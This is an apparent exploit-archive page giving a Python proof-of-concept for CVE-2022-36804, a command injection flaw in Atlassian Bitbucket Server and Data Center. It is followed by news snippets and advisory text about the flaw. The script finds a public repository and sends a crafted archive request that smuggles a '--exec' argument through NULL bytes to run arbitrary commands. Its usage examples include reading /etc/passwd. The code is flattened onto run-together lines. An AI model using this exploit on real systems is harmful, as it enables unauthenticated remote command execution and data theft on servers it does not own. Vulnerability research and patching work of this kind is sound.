Headline
Bitbucket 7.0.0 Remote Command Execution
Bitbucket version 7.0.0 suffers from a remote command execution vulnerability.
# Exploit Title: Bitbucket v7.0.0 - RCE# Date: 09-23-2022# Exploit Author: khal4n1# Vendor Homepage: https://github.com/khal4n1# Tested on: Kali and ubuntu LTS 22.04# CVE : cve-2022-36804#****************************************************************##The following exploit is used to exploit a vulnerability present#Atlassian Bitbucket Server and Data Center 7.0.0 before version#7.6.17, from version 7.7.0 before version 7.17.10, from version#7.18.0 before version 7.21.4, from version 8.0.0 before version#8.0.3, from version 8.1.0 before version 8.1.3, and from version#8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1#Usage Example# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'cat /etc/passwd'# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'id'#The server will send a 500 http response with the stout output from the# command executed.#****************************************************************##!/usr/bin/python3import argparseimport urllibfrom urllib import requestimport re#argument setupparser = argparse.ArgumentParser(description='Program to testbitbucket vulnerability CVE-2022-36804')parser.add_argument("--url", help="Set the target to attack.[REQUIRED]", required=True )parser.add_argument("--cmd", help="Set the command to execute.[DEFAULT ID]", required=True, default='id')args = parser.parse_args()cmd= urllib.parse.quote(args.cmd)#reads from the public repository what is availablerequ = request.urlopen(args.url+ "/repos?visibility=public")response = requ.read()#select a public project and stores it in a variableproject = re.findall('7990/projects/(.*)/repos/',str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[-1]#Selects a public repo and stores it in a vatiablefile = re.findall('/repos/(.*)/browse',str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[0]# Exploitationtry : attack = request.urlopen(args.url +"/rest/api/latest/projects/" + project + "/repos/" + file +"/archive?prefix=ax%00--exec=%60"+cmd+"%60%00--remote=origin") print (attack.response())except urllib.error.HTTPError as e: body = e.read().decode() # Read the body of the error response print (body)Related news
Australian software company Atlassian has rolled out security updates to address two critical flaws affecting Bitbucket Server, Data Center, and Crowd products. The issues, tracked as CVE-2022-43781 and CVE-2022-43782, are both rated 9 out of 10 on the CVSS vulnerability scoring system. CVE-2022-43781, which Atlassian said was introduced in version 7.0.0 of Bitbucket Server and Data Center,
Categories: Exploits and vulnerabilities Categories: News Tags: Atlassian Tags: Bitbucket Tags: git Tags: CVE-2022-36804 Tags: RCE Tags: read permission International cybersecurity authorities are warning about the active exploitation of a vulnerability in Bitbucket Server and Data Center (Read more...) The post Actively exploited vulnerability in Bitbucket Server and Data Center appeared first on Malwarebytes Labs.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a recently disclosed critical flaw impacting Atlassian's Bitbucket Server and Data Center to the Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. Tracked as CVE-2022-36804, the issue relates to a command injection vulnerability that could allow malicious actors to gain arbitrary
Various versions of Bitbucket Server and Data Center are vulnerable to an unauthenticated command injection vulnerability in multiple API endpoints. The /rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive endpoint creates an archive of the repository, leveraging the git-archive command to do so. Supplying NULL bytes to the request enables the passing of additional arguments to the command, ultimately enabling execution of arbitrary commands.
Atlassian has rolled out fixes for a critical security flaw in Bitbucket Server and Data Center that could lead to the execution of malicious code on vulnerable installations. Tracked as CVE-2022-36804 (CVSS score: 9.9), the issue has been characterized as a command injection vulnerability in multiple endpoints that could be exploited via specially crafted HTTP requests. “An
Update now to protect against flaw
Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. This vulnerability was reported via our Bug Bounty Program by TheGrandPew.